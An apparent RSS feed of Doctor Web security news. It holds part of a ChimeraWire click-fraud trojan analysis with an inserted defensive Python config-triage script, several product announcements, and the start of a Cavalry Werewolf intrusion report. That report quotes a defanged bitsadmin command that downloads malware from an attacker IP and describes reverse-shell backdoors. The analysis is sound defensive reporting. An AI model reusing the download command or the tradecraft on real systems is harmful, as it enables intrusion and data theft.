&lt;blockquote&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; got its name from combining the words “chimera”—a mythical creature with the body parts of several animals—and “wire”. The word “chimera” describes the hybrid nature of the attackers’ techniques: the use of trojan downloaders written in different programming languages as well as anti-debugging techniques and privilege escalation during the infection process. Moreover, it reflects the fact that the trojan is a combination of various frameworks, plugins, and legitimate software through which hidden traffic control is carried out. And this is where the second word “wire” comes from: it refers to the trojan’s invisible and malicious network operation.&lt;/blockquote&gt;

&lt;p&gt;Once on the target computer, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; downloads the archive &lt;span class="string"&gt;chrome-win.zip&lt;/span&gt; from a third-party website. This archive contains the Google Chrome browser for Windows. It should be noted that this Internet resource also stores archives containing Google Chrome builds for other operating systems, like Linux and macOS, including those for various hardware platforms.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The website with various Google Chrome builds from which the trojan downloads the necessary archive&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When the browser is downloaded, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; tries to covertly install the add-ons NopeCHA and Buster into it. Designed for automated CAPTCHA solving, these add-ons will be used by the malware further along in its operation.&lt;/p&gt;

&lt;p&gt;Next, it launches the browser in the debugging mode with a hidden window, which allows malicious activity to occur without the user noticing. After that, a connection is established to the automatically selected debugging port via the WebSocket protocol.&lt;/p&gt;

&lt;p&gt;The trojan then proceeds to obtain tasks. It sends a request to the C2 server and receives a base64 string in response. This string contains the JSON configuration encrypted with the AES-GCM algorithm.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Example of the configuration that the trojan receives from the C2 server&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;It contains tasks and the parameters related to them:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;the target search engine (the Google and Bing search platforms are supported);&lt;/li&gt;
    &lt;li&gt;the key phrases for searching websites in the target search engine and for their consequent loading;&lt;/li&gt;
    &lt;li&gt;the maximum number of sequential transitions between webpages;&lt;/li&gt;
    &lt;li&gt;random distributions for performing automated clicks on webpages;&lt;/li&gt;
    &lt;li&gt;the wait time for loading pages;&lt;/li&gt;
    &lt;li&gt;the target domains.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To more effectively simulate the activity of a real user and bypass systems that monitor constant activity, the configuration also includes parameters responsible for pauses between work sessions.&lt;/p&gt;

&lt;h3&gt;Simulating user mouse clicks&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; can perform the following types of clicks:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;for navigating search results;&lt;/li&gt;
    &lt;li&gt;for opening found relevant links in new background tabs.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;First, using the target search engine, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; searches websites by the domains and key phrases specified in the configuration. It then opens the websites listed in the search results and locates every HTML element on them that defines hyperlinks. The trojan puts these elements into a data array and shuffles it so that all of the objects in it are listed in a different order than the order on the webpage. This is to bypass website anti-bot protection that can track the order of clicks.&lt;/p&gt;

&lt;p&gt;Next, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; checks whether the links it has found and the strings in them match the template from the configuration, and then calculates the number of matches. Depending on this number, the malware then uses different operating algorithms.&lt;/p&gt;

&lt;p&gt;If a sufficient number of suitable links is found on the page, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; scans the page and sorts the detected links by their relevance (the links that most closely match key phrases are listed first). After that, a click is performed on one or multiple suitable links.&lt;/p&gt;

&lt;p&gt;If the number of matches with the given template is insufficient or there are none, the malware uses a probabilistic behavior model algorithm that imitates real human behavior as closely as possible. Based on the parameters from the configuration, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; uses a weighted distribution to determine the number of links to be opened. For example, the distribution &lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt; means that the trojan will click 1 link with a probability of 90% and 2 links with a probability of 20%. Thus, the malware is highly likely to open 1 link. The trojan randomly selects the link from the data array it created earlier and performs a click.&lt;/p&gt;

&lt;p&gt;Every time the trojan opens a link from the search results and performs clicks on the loaded webpage, it either returns to the previous browser tab or proceeds to the next one, depending on the task. These actions are repeated until the click limit for the target websites is exhausted.&lt;/p&gt;
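&lt;p&gt;The configuration fields listed above and the weighted click distribution (&lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt;) are what an analyst extracts from a sample to produce blocklists and to understand its behaviour. The Python below is an added example of that triage step, not code from the page or from the trojan: the JSON key names are assumptions (the article names the parameters but not their keys), the sample configuration is constructed, and because the real blob is AES-GCM encrypted inside the base64 string, the decryption step, which requires the recovered key, is left out and the constructed blob is only base64-encoded.&lt;/p&gt;

```python
"""Triage of a decrypted ChimeraWire-style task configuration.

Added example, not the page's code. JSON key names are assumed; the sample
configuration is constructed. The real C2 response is AES-GCM encrypted inside
the base64 string, so here the blob is only base64-encoded and decryption is
out of scope.
"""
import base64
import json

# Constructed sample configuration mirroring the parameters named in the article.
SAMPLE_CONFIG = {
    "engine": "google",                       # target search engine
    "keywords": ["example keyword one", "example keyword two"],
    "max_depth": 3,                           # max sequential page transitions
    "click_distribution": ["1:90", "2:10"],   # weighted number of links to click
    "page_wait_ms": 4000,                     # wait time for page loads
    "targets": ["target-b.example", "target-a.example", "target-a.example"],
    "session_pause": {"min_s": 600, "max_s": 1800},  # pauses between sessions
}
SAMPLE_BLOB = base64.b64encode(json.dumps(SAMPLE_CONFIG).encode()).decode()

SUPPORTED_ENGINES = ("google", "bing")


def parse_distribution(entries):
    """Turn ["1:90", "2:10"] into {1: 0.9, 2: 0.1}.

    Entries are "count:weight". Weights are normalized by their sum, so they are
    read as relative weights rather than required to add up to exactly 100.
    """
    weights = {}
    for item in entries:
        count_s, weight_s = item.split(":", 1)
        count, weight = int(count_s), float(weight_s)
        if not (count >= 1 and weight >= 0):
            raise ValueError(f"bad distribution entry: {item!r}")
        weights[count] = weights.get(count, 0.0) + weight
    total = sum(weights.values())
    if total == 0:
        raise ValueError("distribution has no positive weight")
    return {k: v / total for k, v in sorted(weights.items())}


def decode_config(blob):
    """Decode the base64 blob and validate the fields an analyst cares about."""
    cfg = json.loads(base64.b64decode(blob))
    if cfg["engine"] not in SUPPORTED_ENGINES:
        raise ValueError(f"unsupported engine: {cfg['engine']}")
    return {
        "engine": cfg["engine"],
        "keywords": list(cfg["keywords"]),
        "targets": sorted(set(cfg["targets"])),  # de-duplicated for blocklists
        "max_depth": int(cfg["max_depth"]),
        "page_wait_ms": int(cfg["page_wait_ms"]),
        "click_probabilities": parse_distribution(cfg["click_distribution"]),
        "session_pause": dict(cfg["session_pause"]),
    }


def extract_iocs(parsed):
    """Return the network indicators worth blocking or hunting for."""
    return {"domains": parsed["targets"], "search_terms": parsed["keywords"]}


if __name__ == "__main__":
    parsed = decode_config(SAMPLE_BLOB)
    print(json.dumps(parsed, indent=2))
    print(extract_iocs(parsed))
```

&lt;p&gt;Normalizing the weights rather than trusting that they sum to 100 keeps the parser robust when a task carries an odd distribution, and sorting and de-duplicating the target domains gives a stable list to feed into DNS or proxy blocklists.&lt;/p&gt;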

&lt;p&gt;Below are examples of websites that the trojan was commanded to interact with in tasks received from the C2 server:&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;For detailed technical descriptions of the &lt;b&gt;ChimeraWire&lt;/b&gt; trojan and the malware involved in its download, please refer to the PDF version of the study or visit the Doctor Web virus library.&lt;/p&gt;

&lt;p&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54600&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; 
&lt;/p&gt;

&lt;h3&gt;Conclusion&lt;/h3&gt;

&lt;p&gt;As of now, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;'s malicious activity essentially boils down to performing relatively simple clicker tasks to boost the popularity of websites. At the same time, the functionality of the tools that the trojan is based on allows it to perform a wider range of tasks, including automated actions under the guise of real user activity. For instance, malicious actors can utilize it to fill out web forms on various sites, including those conducting surveys for advertising purposes. In addition, they can use the trojan for reading the contents of webpages and taking screenshots of them — both for the purposes of cyber espionage and for automated data collection to build various databases (e.g., with emails, phone numbers, etc.). &lt;/p&gt;

&lt;p&gt;Thus, we can expect new &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; versions to emerge in the future, in which these and other features will be fully implemented. Doctor Web’s specialists continue to monitor the trojan’s evolution.&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;CK®&lt;/h3&gt;

&lt;p&gt;We analyzed &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; using the MITRE ATT&amp;CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Stage&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Technique&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Execution&lt;/td&gt;
            &lt;td&gt;User Execution (T1204)&lt;br /&gt;&lt;br /&gt;Malicious File (T1204.002)&lt;br /&gt;&lt;br /&gt;Malicious Library (T1204.005)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Windows Command Shell (T1059.003)&lt;br /&gt;&lt;br /&gt;Visual Basic (T1059.005)&lt;br /&gt;&lt;br /&gt;Python (T1059.006)&lt;br /&gt;&lt;br /&gt;Scheduled Task (T1053.005)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Persistence&lt;/td&gt;
            &lt;td&gt;Registry Run Keys / Startup Folder (T1547.001)&lt;br /&gt;&lt;br /&gt;Scheduled Task/Job (T1053)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Privilege Escalation&lt;/td&gt;
            &lt;td&gt;Hijack Execution Flow: DLL (T1574.001)&lt;br /&gt;&lt;br /&gt;Bypass User Account Control (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Defense Evasion&lt;/td&gt;
            &lt;td&gt;Encrypted/Encoded File (T1027.013)&lt;br /&gt;&lt;br /&gt;Debugger Evasion (T1622)&lt;br /&gt;&lt;br /&gt;Hidden Window (T1564.003)&lt;br /&gt;&lt;br /&gt;File/Path Exclusions (T1564.012)&lt;br /&gt;&lt;br /&gt;Deobfuscate/Decode Files or Information (T1140)&lt;br /&gt;&lt;br /&gt;Hijack Execution Flow: DLL (T1574.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Command and Control&lt;/td&gt;
            &lt;td&gt;Bidirectional Communication (T1102.002)&lt;br /&gt;&lt;br /&gt;Web Protocols (T1071.001)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15084&amp;lng=en</guid><title>Dr.Web CureIt! can now see what malware is trying to hide</title><link>https://news.drweb.com/show/?i=15084&amp;lng=en&amp;c=5</link><pubDate>Thu, 20 Nov 2025 08:00:25 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web has updated its free utility Dr.Web CureIt! to introduce a unique feature—the ability to scan files and folders that virus makers add to antivirus exclusions lists. &amp;nbsp;This is a major step in tackling more sophisticated threats that seek to disable information security software to ensure they operate unhindered in the system.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;The new feature was inspired by the success of Dr.Web FixIt!—the product employed by Doctor Web's experts to investigate information security incidents and eliminate complex infections. Many malicious programs attempt to add their own executable files to the antivirus exclusions list as soon as they get into a system. By doing so, they deceive the antivirus and make it ignore malicious objects, which allows attackers to steal data, encrypt files or use the device as a botnet node.&lt;/p&gt;&lt;p&gt;How the new feature works:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;When the scan is started, Dr.Web CureIt! will automatically examine the exclusions lists of Microsoft Defender or any other antivirus found in the system.&lt;/li&gt;&lt;li&gt;Then all files and folders found on these lists are thoroughly scanned by the Dr.Web antivirus engine.&lt;/li&gt;&lt;li&gt;If a malicious object is detected among the exclusions, Dr.Web CureIt! notifies the user and removes the threat.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;This feature can be of vital importance for ordinary users who may be unaware that their security software has been compromised. 
Now, even if a trojan is hiding in plain sight, Dr.Web CureIt! will be able to expose and neutralize it.&lt;/p&gt;&lt;h3&gt;What’s coming next: emergency expert aid for Linux&lt;/h3&gt;&lt;p&gt;Driven by the success of Dr.Web FixIt! under Windows, Doctor Web is also planning to release a full-blown version of the service for Linux to help information security professionals investigate cyberattacks on corporate infrastructures.&lt;br&gt;Currently you can use Dr.Web FixIt! for Linux to collect system information and send it to our technical support engineers. The utility is now available at &lt;a href="https://free.drweb.ru/sysinfo/"&gt;https://free.drweb.ru/sysinfo/&lt;/a&gt;&amp;nbsp;&lt;br&gt;The new service’s design features will subsequently be used to create a Dr.Web CureIt! version that will enable ordinary users to quickly scan their Linux machines and eliminate any consequences of infection.&lt;/p&gt;&lt;p&gt;You can download the updated version of Dr.Web CureIt! free of charge on our official website: &lt;a href="https://free.drweb.com/download+cureit+free/"&gt;https://free.drweb.com/download+cureit+free/&lt;/a&gt;&lt;/p&gt;&lt;p&gt;*Available free of charge for home use only.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15082&amp;lng=en</guid><title>Protect your loved ones from phone scams with the new Anti-scam feature</title><link>https://news.drweb.com/show/?i=15082&amp;lng=en&amp;c=5</link><pubDate>Tue, 18 Nov 2025 08:45:29 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;a href="https://products.drweb.com/home/family_security/?lng=en"&gt;Dr.Web Family Security&lt;/a&gt;—a mobile app that helps you keep your children and adult family members safe in the digital world—has been enhanced to include the Anti-scam feature, providing even more reliable protection from phone scams and blackmail.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;How the Anti-scam 
works&lt;/strong&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;It helps you keep your finger on the pulse. As the family manager, you can set a duration limit for calls from numbers that are either hidden or not found on the Contacts list. For example, you can keep them as short as just one minute. That’s sufficient time to say “hello” but not nearly enough time to coerce the target into divulging a valuable piece of information.&lt;/li&gt;&lt;li&gt;It aborts scammer attacks at their outset. The shorter the conversation, the lower the chance of an attacker being able to gain your family member’s trust to obtain transaction confirmation codes from SMS; bank card data; or passwords. You’re taking away their most vital resource —time.&lt;/li&gt;&lt;li&gt;It makes sure your family members will never miss the things that matter. If an important call gets cut short by the filter, simply add the number to the Allowed lists—and all subsequent calls from that number will never get interrupted by Dr.Web. Maintain full control and stay connected.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This release also incorporates stability and performance upgrades for the app.&amp;nbsp;&lt;br&gt;The latest Dr.Web Family Security version is already available on Google Play and will appear on Doctor Web’s site drweb.com and on AppGallery shortly. Keep an eye on your update notifications!&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15079&amp;lng=en</guid><title>Updated version of Dr.Web for mobile devices comes with a smart security system</title><link>https://news.drweb.com/show/?i=15079&amp;lng=en&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;Updated antivirus products for protecting Android-based smartphones, tablets and other mobile devices have been released. 
The main improvements concern the automation of the protection and operational stability.&lt;/newslead&gt;&lt;h3&gt;What makes this release special?&amp;nbsp;&lt;/h3&gt;&lt;p&gt;The new automated threat-processing feature allows Dr.Web solutions to remove malicious objects and to block suspicious links or isolate potentially dangerous applications without delays and manual user intervention.&amp;nbsp;&lt;/p&gt;&lt;h3&gt;What does this mean for users?&lt;/h3&gt;&lt;p&gt;Now users of personal devices do not need to monitor all of the threat notifications as they did before because manual responses can be completely eliminated. This feature has been designed to ensure that the antivirus product’s response won't depend on the user's response to system notifications about detected threats and the actions that have been performed with them. The intelligent system, developed by Doctor Web specialists, independently eliminates threats in real time in accordance with the parameters specified for responding to certain types of malware.&amp;nbsp;&lt;br&gt;Corporate users will especially enjoy this feature. The automated removal of malicious objects and the blocking of suspicious links and many other actions occur instantly without the direct participation of administrators. This feature is also supported by the Control Center.&lt;/p&gt;&lt;h3&gt;Administration has become even more convenient&lt;/h3&gt;&lt;p&gt;This update delivers the ability to centrally manage the actions of the Scanner and SpIDer Guard components when various types of threats are detected on Android-based devices. Now the administrator can configure how the Dr.Web agent will respond to threats — notify, delete or ignore them, depending on the category.&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;Important notice!&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Starting with the new version, support is no longer available for Android version 4.4. 
Please pay attention to this when updating the product.&amp;nbsp;&lt;br&gt;If you are using the Dr.Web Security Space version for mobile devices and downloaded it from Doctor Web's official website, you must completely reinstall the application in order to update it — download the latest version of the agent and install it.&amp;nbsp;&lt;br&gt;For users of Dr.Web Security Space for mobile devices who downloaded the application from Google Play and who are using Dr.Web subscriptions or Dr.Web Mobile Security Suite, the update will proceed as usual.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15080&amp;lng=en</guid><title>Dr.Web Enterprise Security Suite and Dr.Web Industrial centralized management servers have been updated</title><link>https://news.drweb.com/show/?i=15080&amp;lng=en&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;A new update for Dr.Web Enterprise Security Suite and Dr.Web Industrial servers has been released. The new version delivers stability improvements and new tools for centrally managing actions when threats are detected on Android devices. To gain all of the new benefits and for correct system operation, users are recommended to update their servers to the latest version.&lt;/newslead&gt;&lt;p&gt;The new version of the Dr.Web Enterprise Security Suite server includes changes that improve security-system management. Changes have also occurred in Dr.Web for Android mobile devices — these ensure that the Control Center has full control of the antivirus protection.&lt;/p&gt;&lt;p&gt;This update delivers the ability to centrally manage the actions of the Scanner and SpIDer Guard components when various types of threats are detected on Android devices. 
Now the administrator can configure how the Dr.Web agent will respond to threats — notify, delete or ignore them, depending on the category.&lt;/p&gt;&lt;p&gt;The settings previously presented as the parameters "Scan for adware" and "Scan for potentially dangerous programs" have been replaced by a new mechanism for customising actions. If these scan parameters are disabled, after the update, the default &amp;nbsp;action "Ignore" will be applied to the corresponding programs. In other cases, the "Report" action is used.&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;Important notice for users&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;To take advantage of the full range of the new version’s features and to ensure that the protection components operate correctly, the centralized management servers must be updated to the latest version.&lt;br&gt;The update is available for download via the management console’s web interface.&lt;br&gt;If antivirus network administrators have any questions on how to configure or plan the update, they can contact our Technical Support Service for a consultation.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15078&amp;lng=en</guid><title>Cavalry Werewolf hacker group attacks Russian state institutions</title><link>https://news.drweb.com/show/?i=15078&amp;lng=en&amp;c=5</link><pubDate>Thu, 06 Nov 2025 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/Cavalry_Werewolf_en.pdf" class='btn'&gt;Download PDF&lt;/a&gt;
&lt;/div&gt;
&lt;p&gt;&lt;b&gt;November 6, 2025&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;&lt;newslead&gt;In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. This hypothesis derived from the fact that spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data.&lt;/newslead&gt;&lt;/p&gt;
&lt;p&gt;During the examination, our experts identified previously unknown malware, some of it built on open-source tools. Among the samples were several backdoors that allow commands to be executed remotely on the attacked systems, the ground to be laid for reconnaissance, and a foothold to be established in the network infrastructure.&lt;/p&gt;
&lt;p&gt;In this study, we describe the Cavalry Werewolf tools we discovered, the distinguishing features of this hacker group, and the typical actions its members perform in compromised networks.&lt;/p&gt;
&lt;h3&gt;General information about the attack and the tools involved&lt;/h3&gt;
&lt;p&gt;To gain initial access to one of the computers, the threat actors used a common attack vector: phishing emails with malware attached under the guise of documents. In this case, the messages carried &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;, a backdoor that was unknown at the time of the attack. It is based on the open-source &lt;a href="https://github.com/xcyraxx/Reverse-Shell-CS" target="_blank"&gt;Reverse-Shell-CS&lt;/a&gt; project and opens a reverse shell through which the attackers connect to the infected system and execute commands. The backdoor was delivered inside a password-protected archive, under file names that varied from one phishing campaign to another.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Name variants for BackDoor.ShellNET.1&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Службеная записка от 16.06.2025___________________________.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О проведении личного приема граждан список участников.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;An example of a phishing email containing &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;. The attackers offer the potential victim a “document” to read and provide a password that can be used to unpack the archive&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, the threat actors continued to entrench themselves in the target system. They downloaded several malicious programs with Bitsadmin (&lt;span class="string"&gt;C:\Windows\SysWOW64\bitsadmin.exe&lt;/span&gt;), a standard Windows tool for managing file-transfer jobs. It was launched with a specific set of command-line switches under the account of the current system administrator, as in the example below:&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;The first threat downloaded with &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt; was the &lt;a href="https://vms.drweb.com/search/?q=Trojan.FileSpyNET.5&amp;lng=en"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt; stealer trojan. The cybercriminals used it to collect and exfiltrate documents stored on the computer in .doc, .docx, .xlsx and .pdf formats, text files (.txt), and images (.jpg, .png).&lt;/p&gt;
&lt;p&gt;Next, the attackers installed &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Tunnel.41&amp;lng=en"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt;, a backdoor built on the open-source &lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt; tool, to create SOCKS5 tunnels. Through these tunnels they could connect to the computer unobtrusively and execute commands on it, including commands that install other malware.&lt;/p&gt;
&lt;h3&gt;Cavalry Werewolf tools&lt;/h3&gt;
&lt;p&gt;Our investigation into this incident uncovered not only the malware described above but also many other tools this criminal group uses in its targeted attacks. Notably, Cavalry Werewolf does not limit itself to a single set of malicious programs and is constantly expanding its arsenal. For this reason, both the tools used to penetrate target systems and the subsequent stages of the infection chain can vary, depending on which institution is being attacked.&lt;/p&gt;
&lt;h3&gt;The entry point&lt;/h3&gt;
&lt;p&gt;The malicious programs in Cavalry Werewolf’s phishing emails are the first stage of the infection chain, and they come in several forms. Doctor Web’s virus analysts identified the following variants:&lt;/p&gt;
&lt;ul class="list"&gt;
